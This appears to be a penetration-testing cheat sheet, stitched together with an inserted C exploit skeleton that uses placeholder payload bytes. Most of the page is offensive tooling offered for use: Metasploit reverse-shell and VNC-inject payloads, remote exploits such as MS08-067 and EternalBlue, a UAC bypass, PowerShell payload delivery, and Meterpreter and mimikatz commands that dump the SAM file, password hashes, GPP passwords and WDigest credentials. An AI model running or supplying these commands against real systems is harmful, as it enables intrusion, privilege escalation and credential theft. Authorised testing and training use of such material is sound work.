COMPILING

Compiling Windows executable on Kali

Compile

i686-w64-mingw32-gcc exploit.c -lws2_32 -o exploit.exe

Execute

wine exploit.exe 10.11.1.35
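As an added example (not code from this page or any Metasploit module), here is a skeleton for the exploit.c that the compile and run lines above expect. The point it demonstrates is why the mingw build needs -lws2_32: the Windows build goes through Winsock (WSAStartup/closesocket), while the same file also compiles natively on Kali through BSD sockets, so the buffer-building logic can be unit-tested on Linux before it is cross-compiled and run under wine. The target port (4444), the 4-byte header and the payload bytes are constructed placeholders, not values from the page; a real exploit fills them from the target protocol.

```c
/*
 * exploit.c skeleton (added example, not from the page).
 * Build on Kali:  i686-w64-mingw32-gcc exploit.c -lws2_32 -o exploit.exe
 * Build natively: gcc exploit.c -o exploit
 * Run:            wine exploit.exe <target-ip>   (or ./exploit <target-ip>)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#define _WIN32_WINNT 0x0600          /* needed for inet_pton in ws2tcpip.h */
#include <winsock2.h>                /* Winsock: the reason for -lws2_32 */
#include <ws2tcpip.h>
typedef SOCKET sock_t;
#define sock_close closesocket
#else
#include <sys/socket.h>              /* native build: BSD sockets, same API shape */
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
typedef int sock_t;
#define INVALID_SOCKET (-1)
#define sock_close close
#endif

#define TARGET_PORT 4444             /* assumed placeholder port, not from the page */

/* Bring up the socket layer; Winsock needs WSAStartup, Linux needs nothing. Returns 1 on success. */
int net_init(void) {
#ifdef _WIN32
    WSADATA wsa;
    return WSAStartup(MAKEWORD(2, 2), &wsa) == 0;
#else
    return 1;
#endif
}

void net_cleanup(void) {
#ifdef _WIN32
    WSACleanup();
#endif
}

/* Assemble header + payload into out. Returns bytes written, or 0 if cap is too small
   (bounds-checked so the exploit cannot overflow its own send buffer). */
size_t build_buffer(unsigned char *out, size_t cap,
                    const unsigned char *header, size_t header_len,
                    const unsigned char *payload, size_t payload_len) {
    if (header_len > cap || payload_len > cap - header_len)
        return 0;
    memcpy(out, header, header_len);
    memcpy(out + header_len, payload, payload_len);
    return header_len + payload_len;
}

/* Connect to ip:port over TCP and send len bytes. Returns 0 on success, -1 on any failure. */
int send_buffer(const char *ip, unsigned short port, const unsigned char *buf, size_t len) {
    struct sockaddr_in sa;
    sock_t s;
    size_t sent = 0;

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1) {
        fprintf(stderr, "bad IPv4 address: %s\n", ip);
        return -1;
    }
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == INVALID_SOCKET)
        return -1;
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) != 0) {
        sock_close(s);
        return -1;
    }
    while (sent < len) {                      /* send() may write less than asked */
        int n = send(s, (const char *)buf + sent, (int)(len - sent), 0);
        if (n <= 0) { sock_close(s); return -1; }
        sent += (size_t)n;
    }
    sock_close(s);
    return 0;
}

int main(int argc, char **argv) {
    static const unsigned char header[]  = "HDR:";        /* constructed placeholder */
    static const unsigned char payload[] = "PLACEHOLDER"; /* constructed placeholder */
    unsigned char buf[1024];
    size_t len;
    int rc;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <target-ip>\n", argv[0]);
        return 1;
    }
    if (!net_init())
        return 1;
    len = build_buffer(buf, sizeof buf, header, sizeof header - 1, payload, sizeof payload - 1);
    rc = (len == 0) ? -1 : send_buffer(argv[1], TARGET_PORT, buf, len);
    net_cleanup();
    printf(rc == 0 ? "sent %lu bytes\n" : "send failed (%lu bytes built)\n", (unsigned long)len);
    return rc == 0 ? 0 : 1;
}
```

The `%lu` with a cast instead of `%zu` is deliberate: the msvcrt printf that mingw links against does not understand `%zu`, so the cast keeps output correct under wine as well as on Linux.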

METASPLOIT

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcp
set ViewOnly false

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp

List of Metasploit Commands, Meterpreter Cheat Sheet

Useful meterpreter commands.

Command | Description

upload file c:\\windows | Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target
execute -f c:\\windows\\temp\\exploit.exe | Meterpreter run .exe on target
ps | Meterpreter show processes
shell | Meterpreter get shell on the target
getsystem | Meterpreter attempts privilege escalation on the target
hashdump | Meterpreter attempts to dump the hashes on the target
portfwd add -l 3389 -p 3389 -r target | Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target | Meterpreter delete port forward

Common Metasploit Modules

Remote Windows Metasploit Modules (exploits)

Command | Description

use exploit/windows/smb/ms08_067_netapi | MS08-067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms06_040_netapi | MS06-040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index | MS09-050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit
use exploit/windows/smb/ms17_010_eternalblue | MS17-010 EternalBlue Remote Exploit

Local Windows Metasploit Modules (exploits)

Command | Description

use exploit/windows/local/bypassuac | Bypass UAC on Windows 7; set target and payload arch (x86/x64) to match the session

Auxiliary Metasploit Modules

Command | Description

use auxiliary/scanner/http/dir_scanner | Metasploit HTTP directory scanner

use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner

use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner

use auxiliary/scanner/mysql/mysql_version | Metasploit MySQL Version Scanner

use auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module

Metasploit Powershell Modules

Command | Description

use exploit/multi/script/web_delivery | Metasploit PowerShell payload delivery module

run post/windows/manage/powershell/exec_powershell | Metasploit upload and run PowerShell script through a session

use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy

use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Command | Description

run post/windows/gather/win_privs | Metasploit show privileges of current user

use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords

load mimikatz, then wdigest | Metasploit load Mimikatz extension and dump WDigest credentials

run post/windows/gather/local_admin_search_enum | Identify other machines that the supplied domain user has administrative access to